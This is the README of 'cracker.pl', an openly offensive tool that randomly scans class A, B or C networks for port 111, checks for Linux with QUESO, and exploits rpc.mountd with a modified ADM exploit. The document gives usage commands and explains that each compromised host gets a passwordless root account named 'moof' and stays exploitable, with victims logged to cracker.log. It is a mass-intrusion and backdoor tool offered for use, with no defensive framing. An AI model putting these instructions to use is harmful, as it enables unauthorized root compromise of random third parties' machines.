cracker.pl

The real credit goes to the programmer of QUESO and to
ADM for exploiting rpc.mountd.

Comments/suggestions may be emailed to ryan@phorce.net.

Flames may be directed towards /dev/null.

### How to use ###

If you want to just let it do its own thing, just simply type

./cracker.pl <class> &
for example: ./cracker.pl B &
Will constantly scan random class B's for as long as the box stays up.

If you want to scan a specified subnet, simply type
./cracker.pl -s
It will prompt you for pscan syntax, the pscan syntax is
./pscan <Class A> <port> [class b] [class c]
For example, if you wanted to scan all of 206.10.*.* you would type
"206 111 10" at the prompt, always scan for port 111.

If have problems running this, please run with -b (verbose) and email a log
to ryan@phorce.net, thanks!

Every box cracker finds vulnerable it will add to cracker.log.

A user "moof" is created on each exploit, it also leaves the box
exploitable, so.. you can still get in with rpc.mountd after the
initial exploit.

Run ./install.sh to install all the propper binaries, yes, you must
be root.

####
What does this do?
- Random generates class A,B,C (your choice), portscans for 111, does
  queso os check for linux, and attempts to exploit it.. the ADMmountd
  has been modded to add a user moof to the password file with no pw
  and uid/gid 0.

shouts go out to DrUnix, Drago, and of course tnt/p.

Also shouts to Volatile, a person I dont know but I'm using his
pscan in this package without his permission. (which I think
is semi-private)

-ryan
